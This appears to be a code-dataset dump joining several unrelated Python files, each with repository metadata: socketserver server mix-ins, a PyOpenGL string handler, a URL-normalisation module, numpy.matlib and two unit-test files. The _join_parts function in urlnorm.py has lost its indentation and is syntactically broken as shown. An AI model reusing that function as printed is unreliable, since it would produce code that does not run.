        """Collect the zombie child processes regularly in the ForkingMixIn.
        service_actions is called in the BaseServer's serve_forever loop.
        """
        self.collect_children()
    def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        pid = os.fork()
        if pid:
            # Parent process
            if self.active_children is None:
                self.active_children = []
            self.active_children.append(pid)
            self.close_request(request)
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    os._exit(1)
class ThreadingMixIn:
    """Mix-in class to handle each request in a new thread."""
    # Whether handler threads should be killed along with the main process.
    daemon_threads = False
    def process_request_thread(self, request, client_address):
        """Thread body: run the handler, then shut the request down.

        Mirrors BaseServer.process_request, with exception handling added
        because an unhandled error would otherwise kill the worker thread
        silently.
        """
        try:
            self.finish_request(request, client_address)
            self.shutdown_request(request)
        except:
            self.handle_error(request, client_address)
            self.shutdown_request(request)
    def process_request(self, request, client_address):
        """Spawn a worker thread for the request; returns immediately."""
        worker = threading.Thread(
            target=self.process_request_thread,
            args=(request, client_address))
        worker.daemon = self.daemon_threads
        worker.start()
# Pre-built concrete servers: the mix-in comes first so that its
# process_request override wins in the MRO.
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
# Unix-domain variants exist only where the platform supports AF_UNIX.
if hasattr(socket, 'AF_UNIX'):
    class UnixStreamServer(TCPServer):
        address_family = socket.AF_UNIX
    class UnixDatagramServer(UDPServer):
        address_family = socket.AF_UNIX
    class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
    class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
    """Base class for request handler classes.
    This class is instantiated for each request to be handled.  The
    constructor sets the instance variables request, client_address
    and server, and then calls the handle() method.  To implement a
    specific service, all you need to do is to derive a class which
    defines a handle() method.
    The handle() method can find the request as self.request, the
    client address as self.client_address, and the server (in case it
    needs access to per-server information) as self.server.  Since a
    separate instance is created for each request, the handle() method
    can define arbitrary other instance variables.
    """
    def __init__(self, request, client_address, server):
        self.request = request
        self.client_address = client_address
        self.server = server
        self.setup()
        try:
            self.handle()
        finally:
            # finish() always runs, even when handle() raises.
            self.finish()
    def setup(self):
        # Hook: per-request initialization; overridden by subclasses.
        pass
    def handle(self):
        # Hook: the actual service logic goes here in subclasses.
        pass
    def finish(self):
        # Hook: per-request cleanup; overridden by subclasses.
        pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which receives the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
    """Define self.rfile and self.wfile for stream sockets."""
    # Default buffer sizes for rfile, wfile.
    # We default rfile to buffered because otherwise it could be
    # really slow for large data (a getc() call per byte); we make
    # wfile unbuffered because (a) often after a write() we want to
    # read and we need to flush the line; (b) big writes to unbuffered
    # files are typically optimized by stdio even when big reads
    # aren't.
    rbufsize = -1
    wbufsize = 0
    # A timeout to apply to the request socket, if not None.
    timeout = None
    # Disable nagle algorithm for this socket, if True.
    # Use only when wbufsize != 0, to avoid small packets.
    disable_nagle_algorithm = False
    def setup(self):
        """Wrap the connection in buffered rfile/wfile file objects."""
        self.connection = self.request
        if self.timeout is not None:
            self.connection.settimeout(self.timeout)
        if self.disable_nagle_algorithm:
            self.connection.setsockopt(socket.IPPROTO_TCP,
                                       socket.TCP_NODELAY, True)
        self.rfile = self.connection.makefile('rb', self.rbufsize)
        self.wfile = self.connection.makefile('wb', self.wbufsize)
    def finish(self):
        """Flush and close both file wrappers (flush is best-effort)."""
        if not self.wfile.closed:
            try:
                self.wfile.flush()
            except socket.error:
                # A final socket error may have occurred here, such as
                # the local error ECONNABORTED.
                pass
        self.wfile.close()
        self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
    # XXX Regrettably, I cannot get this working on Linux;
    # s.recvfrom() doesn't return a meaningful client address.
    """Define self.rfile and self.wfile for datagram sockets."""
    def setup(self):
        """Expose the received datagram as rfile/wfile file objects."""
        from io import BytesIO
        packet, sock = self.request
        self.packet = packet
        self.socket = sock
        self.rfile = BytesIO(packet)
        self.wfile = BytesIO()
    def finish(self):
        """Send whatever the handler wrote to wfile back to the client."""
        reply = self.wfile.getvalue()
        self.socket.sendto(reply, self.client_address)
| mit |
tinkerinestudio/Tinkerine-Suite | TinkerineSuite/python/Lib/OpenGL/arrays/strings.py | 2 | 3076 | """String-array-handling code for PyOpenGL
"""
#from OpenGL.arrays._strings import dataPointer as old
from OpenGL import constants
from OpenGL.arrays import formathandler
import ctypes
# CPython C-API entry point that yields the address of a (Python 2.x)
# string object's internal character buffer.
psas = ctypes.pythonapi.PyString_AsString
# it's a c_char_p, but if we use that then the code will
# attempt to use null-terminated versus arbitrarily sized
psas.restype = ctypes.c_size_t
#psas.restype = ctypes.c_char_p
def dataPointer( value, typeCode=None ):
    """Return the address of *value*'s string data (typeCode is unused)."""
    return psas( ctypes.py_object(value) )
class StringHandler( formathandler.FormatHandler ):
    """String-specific data-type handler for OpenGL.

    Treats a Python string as an opaque block of bytes whose address can
    be passed directly to GL entry points.  Strings are input-only: the
    output-array constructors deliberately raise NotImplementedError.
    """
    HANDLED_TYPES = (str, )
    @classmethod
    def from_param( cls, value, typeCode=None ):
        # Hand GL the raw address of the string's byte buffer.
        return ctypes.c_void_p( dataPointer( value ) )
    dataPointer = staticmethod( dataPointer )
    def zeros( self, dims, typeCode=None ):
        """Currently don't allow strings as output types!"""
        # Fixed: previously raised the NotImplemented singleton, which is
        # neither callable nor an exception (calling it dies with a
        # TypeError); NotImplementedError is the intended exception.
        raise NotImplementedError( """Don't currently support strings as output arrays""" )
    def ones( self, dims, typeCode=None ):
        """Currently don't allow strings as output types!"""
        raise NotImplementedError( """Don't currently support strings as output arrays""" )
    def arrayToGLType( self, value ):
        """Given a value, guess OpenGL type of the corresponding pointer"""
        raise NotImplementedError( """Can't guess data-type from a string-type argument""" )
    def arraySize( self, value, typeCode = None ):
        """Given a data-value, calculate ravelled size for the array"""
        # need to get bits-per-element...
        byteCount = BYTE_SIZES[ typeCode ]
        return len(value)//byteCount
    def arrayByteCount( self, value, typeCode = None ):
        """Given a data-value, calculate number of bytes required to represent"""
        return len(value)
    def asArray( self, value, typeCode=None ):
        """Convert given value to an array value of given typeCode"""
        if isinstance( value, str ):
            return value
        elif hasattr( value, 'tostring' ):
            return value.tostring()
        elif hasattr( value, 'raw' ):
            return value.raw
        # could convert types to string here, but we're not registered for
        # anything save string types...
        raise TypeError( """String handler got non-string object: %r"""%(type(value)))
    def dimensions( self, value, typeCode=None ):
        """Determine dimensions of the passed array value (if possible)"""
        raise TypeError(
            """Cannot calculate dimensions for a String data-type"""
        )
# Bytes-per-element for each OpenGL data-type constant; used by
# StringHandler.arraySize to convert a byte length into an element count.
BYTE_SIZES = {
    constants.GL_DOUBLE: ctypes.sizeof( constants.GLdouble ),
    constants.GL_FLOAT: ctypes.sizeof( constants.GLfloat ),
    constants.GL_INT: ctypes.sizeof( constants.GLint ),
    constants.GL_SHORT: ctypes.sizeof( constants.GLshort ),
    constants.GL_UNSIGNED_BYTE: ctypes.sizeof( constants.GLubyte ),
    # NOTE(review): uses GLshort's size for GL_UNSIGNED_SHORT -- same width
    # as GLushort, so the value is correct, but GLushort would read better.
    constants.GL_UNSIGNED_SHORT: ctypes.sizeof( constants.GLshort ),
    constants.GL_BYTE: ctypes.sizeof( constants.GLbyte ),
    constants.GL_UNSIGNED_INT: ctypes.sizeof( constants.GLuint ),
}
janastu/swtstore | swtstore/classes/utils/urlnorm.py | 2 | 7460 | # urlnorm.py - Normalize URLs
# Copyright (C) 2010 Kurt McKee <contactme@kurtmckee.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
__author__ = "Kurt McKee <contactme@kurtmckee.org>"
import re
import urllib
import urlparse
DEFAULT_PORTS = {
'http': u'80',
'https': u'443',
}
NETLOC = re.compile("""
^
(?:
(?P<username>[^:@]+)?
(?:
:
(?P<password>[^@]*)
)?
@
)?
(?P<hostname>[^:]+)
(?:
:
(?P<port>[0-9]*)
)?
$
""", re.VERBOSE,
)
PERCENT_ENCODING = re.compile("%([0-9a-f]{2})", re.IGNORECASE)
UNACCEPTABLE_QUERY_CHARS = re.compile("([^A-Za-z0-9_.~/-])")
# http://www.pc-help.org/obscure.htm
# http://www.securelist.com/en/blog/148/
# Translate the IP address from octal, decimal, and hex
# into a base 10 quadruple octet (like 127.0.0.1)
NUMERIC_IP = re.compile("""
^
(?:
(?P<o0>(?:[0-9]+)|(?:0x[0-9a-f]+))
[.]
)?
(?:
(?P<o1>(?:[0-9]+)|(?:0x[0-9a-f]+))
[.]
)?
(?:
(?P<o2>(?:[0-9]+)|(?:0x[0-9a-f]+))
[.]
)?
(?P<o3>(?:[0-9]+)|(?:0x[0-9a-f]+))
$
""", re.VERBOSE | re.IGNORECASE
)
# Hook lists: callables applied to the raw URL before parsing, and to the
# parsed parts dict after normalization.
_pre_plugins = []
_post_plugins = []
def register_pre_plugin(fn):
    """Register *fn* to be called on the raw URL before normalization."""
    _pre_plugins.append(fn)
def register_post_plugin(fn):
    """Register *fn* to be called on the parts dict after normalization."""
    _post_plugins.append(fn)
def urlnorm(url, base=None):
    """Normalize *url*; when *base* is given, resolve *url* against it first.

    Returns the caller's original string unchanged when the input cannot
    be parsed as an http/https URL.
    """
    newurl = url.strip()
    # Strip embedded CR/LF characters anywhere in the URL.
    newurl = ''.join((v for u in newurl.split('\n') for v in u.split('\r')))
    if newurl.lower().startswith('feed:'):
        newurl = newurl[5:]
    if base is not None:
        newurl = urlparse.urljoin(base.strip(), newurl)
    for fn in _pre_plugins:
        newurl = fn(newurl)
    newurl = _normalize_percent_encoding(newurl)
    parts = _urlparse(newurl)
    if parts is None:
        # Not an http(s) URL -- hand back the original input.
        return url
    # Normalize each component in place, then re-join.
    parts.update(_split_netloc(parts['netloc']))
    parts['scheme'] = _normalize_scheme(parts['scheme'])
    parts['port'] = _normalize_port(parts['port'], parts['scheme'])
    parts['path'] = _normalize_path(parts['path'])
    parts['hostname'] = _normalize_hostname(parts.get('hostname', ''))
    parts['query'] = _split_query(parts['query'])
    for fn in _post_plugins:
        parts.update(fn(parts))
    return _join_parts(parts)
def _urlparse(url):
    """Parse *url* into a dict of its six urlparse components.

    Scheme-less inputs like 'domain.example' and 'domain.example:8080'
    are re-parsed with an 'http://' prefix (in the latter case urlparse
    mistakes the host for a scheme, detected by the digit-leading path).
    Returns None for schemes other than http/https.
    """
    parts = dict(zip(('scheme', 'netloc', 'path', 'params', 'query', 'fragment'),
        urlparse.urlparse(url)
    ))
    if (not parts['scheme'] and not parts['netloc']) or \
        (
            not parts['netloc'] and
            parts['path'] and
            parts['path'][0] in map(str, range(10)) and
            url.startswith('%s:%s' % (parts['scheme'], parts['path']))
        ):
        # url may not have included a scheme, like 'domain.example'
        # url may have been in the form 'domain.example:8080'
        parts = dict(zip(('scheme', 'netloc', 'path', 'params', 'query', 'fragment'),
            urlparse.urlparse('http://%s' % url)
        ))
    elif parts['scheme'].lower() not in ('http', 'https'):
        return None
    return parts
def _join_parts(parts):
url = '%s://' % parts['scheme']
if parts['username']:
url += parts['username']
if parts['password']:
url += ':%s' % parts['password']
url += '@'
url += parts['hostname']
if parts['port']:
url += ':%s' % parts['port']
url += parts['path']
if parts['params']:
url += ';%s' % parts['params']
if parts['query']:
url += '?%s' % _join_query(parts['query'])
if parts['fragment']:
url += '#%s' % parts['fragment']
return url
def _split_netloc(netloc):
    """Split *netloc* into username/password/hostname/port via NETLOC.

    Falls back to empty strings when the netloc does not match.
    """
    match = NETLOC.match(netloc)
    if match is None:
        return {'username': '', 'password': '', 'hostname': '', 'port': ''}
    return match.groupdict()
def _normalize_scheme(scheme):
    """Lower-case *scheme*, defaulting to 'http' when it is empty."""
    lowered = scheme.lower()
    return lowered if lowered else 'http'
def _normalize_port(port, scheme):
    """Drop the port when it matches the scheme's registered default."""
    is_default = scheme in DEFAULT_PORTS and DEFAULT_PORTS[scheme] == port
    return '' if is_default else port
def _normalize_percent_encoding(txt):
    """Decode %XX escapes of unreserved characters; upper-case the rest.

    Unreserved characters (RFC 3986) are decoded to their literal form;
    every other escape keeps its percent form with upper-case hex digits.
    """
    unreserved = u'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.~'
    def repl(hexpair):
        decoded = unichr(int(hexpair.group(1), 16))
        if decoded in unreserved:
            return decoded
        return u'%%%s' % hexpair.group(1).upper()
    return re.sub(PERCENT_ENCODING, repl, txt)
def _normalize_hostname(hostname):
    # Lower-case the hostname and strip a single trailing dot (FQDN form).
    hostname = hostname.lower()
    if hostname.endswith('.'):
        hostname = hostname[:-1]
    # If the host looks like a numeric IP (per the NUMERIC_IP regex, defined
    # elsewhere in this module), rewrite it into canonical dotted-decimal
    # form.  Each captured group may be decimal, octal (leading '0'), or hex
    # (leading '0x'); fewer than four groups means the final group spans the
    # remaining low-order bytes, as accepted by classic inet_aton.
    # NOTE: uses Python 2 semantics (filter() -> list, long, unicode).
    ip = NUMERIC_IP.match(hostname)
    if ip is not None:
        ip = filter(None, ip.groups())
        decimal_ip = 0
        for i in range(len(ip)):
            # Pick the numeric base from the group's prefix: '0x' -> 16,
            # bare leading '0' -> 8, otherwise 10.
            base = (10, 8, 16)[(ip[i][0:1] == '0') + (ip[i][1:2] == 'x')]
            # The last group is masked/shifted to fill all remaining bytes;
            # earlier groups each contribute exactly one byte.
            decimal_ip += (
                (long(ip[i] or '0', base) &
                (256**[1, 4-i][len(ip)==i+1]-1)) <<
                (8*[3-i, 0][len(ip)==i+1])
            )
        # Re-emit the 32-bit value as four dotted decimal octets.
        new_ip = '.'.join([unicode((decimal_ip >> (8*octet)) & 255) for octet in (3, 2, 1, 0)])
        hostname = new_ip
    return hostname
def _normalize_path(path):
    """Collapse '.'/'..' segments and duplicate slashes in *path*.

    A trailing slash in the input is preserved; an empty result collapses
    to '/'.
    """
    segments = path.split('/')
    # Remember whether the original path ended with a slash.
    trailing_slash = segments[-1] == ''
    segments = [seg for seg in segments if seg]
    keep = 0
    for idx in range(len(segments)):
        current = segments[idx]
        if current == '.':
            # A '.' segment is simply dropped.
            segments[idx] = None
        elif current == '..':
            # '..' removes the most recently kept segment (if any).
            segments[keep] = None
            if keep > 0:
                keep -= 1
            segments[idx] = None
        elif current:
            # Compact kept segments toward the front of the list.
            segments[keep] = current
            if keep < idx:
                segments[idx] = None
            keep += 1
    segments.insert(0, '')
    if trailing_slash:
        segments.append('')
    return '/'.join([seg for seg in segments if seg is not None]) or '/'
def _split_query(query):
    """Parse a query string into a {name: [values]} dict.

    Both '&' and ';' separate pairs.  A bare name ('?n') maps to [None]
    while an explicitly empty value ('?n=') maps to [''].  (Logic adapted
    from the Python 2.6 urlparse library, modified for differing needs.)
    """
    ret = {}
    pairs = [piece for chunk in query.split('&') for piece in chunk.split(';')]
    if pairs == ['']:
        return ret
    for pair in pairs:
        name, sep, value = pair.partition('=')
        # Differentiate between '?n=' (empty string) and '?n' (None).
        ret.setdefault(name, []).append(value if sep else None)
    return ret
def _join_query(qdict):
    """Serialize a {name: [values]} dict into a sorted query string.

    None values emit a bare name, empty strings emit 'name=', and all
    names/values are escaped through UNACCEPTABLE_QUERY_CHARS.
    """
    def escape(match):
        return u'%%%s' % hex(ord(match.group(1)))[2:].upper()
    pieces = []
    for name in sorted(qdict.keys()):
        quoted_name = re.sub(UNACCEPTABLE_QUERY_CHARS, escape, name)
        for value in sorted(qdict[name]):
            if value is None:
                pieces.append(quoted_name)
            elif not value:
                pieces.append('%s=' % quoted_name)
            else:
                pieces.append('%s=%s' % (
                    quoted_name,
                    re.sub(UNACCEPTABLE_QUERY_CHARS, escape, value)))
    return '&'.join(pieces)
| bsd-2-clause |
solarjoe/numpy | numpy/matlib.py | 161 | 9584 | from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.matrixlib.defmatrix import matrix, asmatrix
# need * as we're copying the numpy namespace
from numpy import *
# Mirror numpy's version and public namespace so numpy.matlib can act as a
# drop-in replacement for numpy, then publish the matlib-only additions.
__version__ = np.__version__
__all__ = np.__all__[:] # copy numpy namespace
__all__ += ['rand', 'randn', 'repmat']
def empty(shape, dtype=None, order='C'):
    """Return a new matrix of given shape and type, without initializing.

    Parameters
    ----------
    shape : int or tuple of int
        Shape of the empty matrix.
    dtype : data-type, optional
        Desired output data-type.
    order : {'C', 'F'}, optional
        Row-major (C-style) or column-major (Fortran-style) memory layout.

    Returns
    -------
    out : matrix
        Matrix whose entries hold whatever happened to be in memory, so
        all values must be set before use.

    See Also
    --------
    empty_like, zeros
    """
    # Allocate uninitialized storage, like np.empty, but typed as matrix.
    return ndarray.__new__(matrix, shape, dtype, order=order)
def ones(shape, dtype=None, order='C'):
    """Return a matrix of the given shape and dtype, filled with ones.

    Parameters
    ----------
    shape : int or sequence of ints
        Shape of the matrix.  A scalar or length-one shape ``N`` yields a
        single-row matrix of shape ``(1, N)``.
    dtype : data-type, optional
        Desired data-type; default is np.float64.
    order : {'C', 'F'}, optional
        Memory layout, default 'C'.

    Returns
    -------
    out : matrix
        Matrix of ones of the given shape, dtype, and order.

    See Also
    --------
    numpy.ones, matlib.zeros
    """
    out = ndarray.__new__(matrix, shape, dtype, order=order)
    out.fill(1)
    return out
def zeros(shape, dtype=None, order='C'):
    """Return a matrix of the given shape and dtype, filled with zeros.

    Parameters
    ----------
    shape : int or sequence of ints
        Shape of the matrix.  A scalar or length-one shape ``N`` yields a
        single-row matrix of shape ``(1, N)``.
    dtype : data-type, optional
        Desired data-type; default is float.
    order : {'C', 'F'}, optional
        Memory layout, default 'C'.

    Returns
    -------
    out : matrix
        Zero matrix of the given shape, dtype, and order.

    See Also
    --------
    numpy.zeros, matlib.ones
    """
    out = ndarray.__new__(matrix, shape, dtype, order=order)
    out.fill(0)
    return out
def identity(n, dtype=None):
    """Return the square n x n identity matrix.

    Parameters
    ----------
    n : int
        Size of the returned identity matrix.
    dtype : data-type, optional
        Data-type of the output; defaults to float.

    Returns
    -------
    out : matrix
        n x n matrix with ones on the main diagonal, zeros elsewhere.

    See Also
    --------
    numpy.identity, matlib.eye
    """
    # A pattern of one 1 followed by n zeros, tiled cyclically across the
    # n*n flat buffer, lands the ones exactly on the main diagonal.
    pattern = array([1] + n * [0], dtype=dtype)
    out = ndarray.__new__(matrix, (n, n), dtype, order='C')
    out.flat = pattern
    return out
def eye(n, M=None, k=0, dtype=float):
    """Return an n x M matrix with ones on the k-th diagonal.

    Parameters
    ----------
    n : int
        Number of rows in the output.
    M : int, optional
        Number of columns; defaults to `n`.
    k : int, optional
        Diagonal offset: 0 selects the main diagonal, positive values an
        upper diagonal, negative values a lower diagonal.
    dtype : dtype, optional
        Data-type of the returned matrix.

    Returns
    -------
    I : matrix
        Matrix of zeros except for ones along the selected diagonal.

    See Also
    --------
    numpy.eye, identity
    """
    # Delegate to the ndarray implementation and view the result as matrix.
    return asmatrix(np.eye(n, M, k, dtype))
def rand(*args):
    """Return a matrix of the given shape with uniform [0, 1) samples.

    The shape is given either as separate integer arguments or as a single
    tuple; when the first argument is a tuple, any further arguments are
    ignored.

    Returns
    -------
    out : matrix
        Matrix of random values with the given shape.

    See Also
    --------
    randn, numpy.random.rand
    """
    shape = args[0] if isinstance(args[0], tuple) else args
    return asmatrix(np.random.rand(*shape))
def randn(*args):
    """Return a matrix of standard-normal (mean 0, variance 1) samples.

    The shape is given either as separate integer arguments or as a single
    tuple; when the first argument is a tuple, any further arguments are
    ignored.  For samples from N(mu, sigma**2) use
    ``sigma * np.matlib.randn(...) + mu``.

    Returns
    -------
    Z : matrix of floats
        Matrix of samples drawn from the standard normal distribution.

    See Also
    --------
    rand, numpy.random.randn
    """
    shape = args[0] if isinstance(args[0], tuple) else args
    return asmatrix(np.random.randn(*shape))
def repmat(a, m, n):
    """Tile a 0-D to 2-D array or matrix *a* into an m-by-n grid.

    Parameters
    ----------
    a : array_like
        The array or matrix to be repeated.
    m, n : int
        Repetition counts along the first and second axes.

    Returns
    -------
    out : ndarray
        Result of shape (m * rows(a), n * cols(a)); the concrete class
        follows ``asanyarray``, so matrix input yields matrix output.
    """
    arr = asanyarray(a)
    if arr.ndim == 0:
        rows, cols = 1, 1
    elif arr.ndim == 1:
        rows, cols = 1, arr.shape[0]
    else:
        rows, cols = arr.shape
    total_rows = rows * m
    total_cols = cols * n
    # Repeat whole copies along axis 0 first, then repeat each row block
    # and fold the extra copies into the column dimension.
    tiled = arr.reshape(1, arr.size).repeat(m, 0).reshape(total_rows, cols).repeat(n, 0)
    return tiled.reshape(total_rows, total_cols)
| bsd-3-clause |
eestay/edx-platform | pavelib/paver_tests/test_prereqs.py | 99 | 1862 | import os
import unittest
from pavelib.prereqs import no_prereq_install
class TestPaverPrereqInstall(unittest.TestCase):
    """
    Test the status of the NO_PREREQ_INSTALL variable, its presence and how
    paver handles it.
    """

    def check_val(self, set_val, expected_val):
        """
        Verify that setting the variable to a certain value returns
        the expected boolean for it.

        As environment variables are only stored as strings, we have to cast
        whatever it's set at to a boolean that does not violate expectations.
        """
        _orig_environ = dict(os.environ)
        os.environ['NO_PREREQ_INSTALL'] = set_val
        try:
            self.assertEqual(
                no_prereq_install(),
                expected_val,
                'NO_PREREQ_INSTALL is set to {}, but we read it as {}'.format(
                    set_val, expected_val),
            )
        finally:
            # Restore the environment even when the assertion above fails;
            # previously the restore ran after the assert, so one failing
            # case leaked NO_PREREQ_INSTALL into every later test.
            os.environ.clear()
            os.environ.update(_orig_environ)

    def test_no_prereq_install_true(self):
        """
        Ensure that 'true' will be True.
        """
        self.check_val('true', True)

    def test_no_prereq_install_false(self):
        """
        Ensure that 'false' will be False.
        """
        self.check_val('false', False)

    def test_no_prereq_install_True(self):
        """
        Ensure that 'True' will be True.
        """
        self.check_val('True', True)

    def test_no_prereq_install_False(self):
        """
        Ensure that 'False' will be False.
        """
        self.check_val('False', False)

    def test_no_prereq_install_0(self):
        """
        Ensure that '0' will be False.
        """
        self.check_val('0', False)

    def test_no_prereq_install_1(self):
        """
        Ensure that '1' will be True.
        """
        self.check_val('1', True)
| agpl-3.0 |
eckucukoglu/arm-linux-gnueabihf | lib/python2.7/unittest/test/test_result.py | 104 | 19064 | import sys
import textwrap
from StringIO import StringIO
from test import test_support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
    """Tests for the bookkeeping behaviour of ``unittest.TestResult``."""
    # Note: there are not separate tests for TestResult.wasSuccessful(),
    # TestResult.errors, TestResult.failures, TestResult.testsRun or
    # TestResult.shouldStop because these only have meaning in terms of
    # other TestResult methods.
    #
    # Accordingly, tests for the aforenamed attributes are incorporated
    # in with the tests for the defining methods.
    ################################################################
    def test_init(self):
        result = unittest.TestResult()
        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 0)
        self.assertEqual(result.shouldStop, False)
        self.assertIsNone(result._stdout_buffer)
        self.assertIsNone(result._stderr_buffer)
    # "This method can be called to signal that the set of tests being
    # run should be aborted by setting the TestResult's shouldStop
    # attribute to True."
    def test_stop(self):
        result = unittest.TestResult()
        result.stop()
        self.assertEqual(result.shouldStop, True)
    # "Called when the test case test is about to be run. The default
    # implementation simply increments the instance's testsRun counter."
    def test_startTest(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass
        test = Foo('test_1')
        result = unittest.TestResult()
        result.startTest(test)
        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)
        result.stopTest(test)
    # "Called after the test case test has been executed, regardless of
    # the outcome. The default implementation does nothing."
    def test_stopTest(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass
        test = Foo('test_1')
        result = unittest.TestResult()
        result.startTest(test)
        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)
        result.stopTest(test)
        # Same tests as above; make sure nothing has changed
        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)
    # "Called before and after tests are run. The default implementation does nothing."
    def test_startTestRun_stopTestRun(self):
        result = unittest.TestResult()
        result.startTestRun()
        result.stopTestRun()
    # "addSuccess(test)"
    # ...
    # "Called when the test case test succeeds"
    # ...
    # "wasSuccessful() - Returns True if all tests run so far have passed,
    # otherwise returns False"
    # ...
    # "testsRun - The total number of tests run so far."
    # ...
    # "errors - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test which raised an
    # unexpected exception. Contains formatted
    # tracebacks instead of sys.exc_info() results."
    # ...
    # "failures - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test where a failure was
    # explicitly signalled using the TestCase.fail*() or TestCase.assert*()
    # methods. Contains formatted tracebacks instead
    # of sys.exc_info() results."
    def test_addSuccess(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass
        test = Foo('test_1')
        result = unittest.TestResult()
        result.startTest(test)
        result.addSuccess(test)
        result.stopTest(test)
        self.assertTrue(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)
    # "addFailure(test, err)"
    # ...
    # "Called when the test case test signals a failure. err is a tuple of
    # the form returned by sys.exc_info(): (type, value, traceback)"
    # ...
    # "wasSuccessful() - Returns True if all tests run so far have passed,
    # otherwise returns False"
    # ...
    # "testsRun - The total number of tests run so far."
    # ...
    # "errors - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test which raised an
    # unexpected exception. Contains formatted
    # tracebacks instead of sys.exc_info() results."
    # ...
    # "failures - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test where a failure was
    # explicitly signalled using the TestCase.fail*() or TestCase.assert*()
    # methods. Contains formatted tracebacks instead
    # of sys.exc_info() results."
    def test_addFailure(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass
        test = Foo('test_1')
        try:
            test.fail("foo")
        except:
            exc_info_tuple = sys.exc_info()
        result = unittest.TestResult()
        result.startTest(test)
        result.addFailure(test, exc_info_tuple)
        result.stopTest(test)
        self.assertFalse(result.wasSuccessful())
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(len(result.failures), 1)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)
        test_case, formatted_exc = result.failures[0]
        self.assertTrue(test_case is test)
        self.assertIsInstance(formatted_exc, str)
    # "addError(test, err)"
    # ...
    # "Called when the test case test raises an unexpected exception err
    # is a tuple of the form returned by sys.exc_info():
    # (type, value, traceback)"
    # ...
    # "wasSuccessful() - Returns True if all tests run so far have passed,
    # otherwise returns False"
    # ...
    # "testsRun - The total number of tests run so far."
    # ...
    # "errors - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test which raised an
    # unexpected exception. Contains formatted
    # tracebacks instead of sys.exc_info() results."
    # ...
    # "failures - A list containing 2-tuples of TestCase instances and
    # formatted tracebacks. Each tuple represents a test where a failure was
    # explicitly signalled using the TestCase.fail*() or TestCase.assert*()
    # methods. Contains formatted tracebacks instead
    # of sys.exc_info() results."
    def test_addError(self):
        class Foo(unittest.TestCase):
            def test_1(self):
                pass
        test = Foo('test_1')
        try:
            raise TypeError()
        except:
            exc_info_tuple = sys.exc_info()
        result = unittest.TestResult()
        result.startTest(test)
        result.addError(test, exc_info_tuple)
        result.stopTest(test)
        self.assertFalse(result.wasSuccessful())
        self.assertEqual(len(result.errors), 1)
        self.assertEqual(len(result.failures), 0)
        self.assertEqual(result.testsRun, 1)
        self.assertEqual(result.shouldStop, False)
        test_case, formatted_exc = result.errors[0]
        self.assertTrue(test_case is test)
        self.assertIsInstance(formatted_exc, str)
    def testGetDescriptionWithoutDocstring(self):
        result = unittest.TextTestResult(None, True, 1)
        self.assertEqual(
                result.getDescription(self),
                'testGetDescriptionWithoutDocstring (' + __name__ +
                '.Test_TestResult)')
    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def testGetDescriptionWithOneLineDocstring(self):
        """Tests getDescription() for a method with a docstring."""
        result = unittest.TextTestResult(None, True, 1)
        self.assertEqual(
                result.getDescription(self),
               ('testGetDescriptionWithOneLineDocstring '
                '(' + __name__ + '.Test_TestResult)\n'
                'Tests getDescription() for a method with a docstring.'))
    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def testGetDescriptionWithMultiLineDocstring(self):
        """Tests getDescription() for a method with a longer docstring.
        The second line of the docstring.
        """
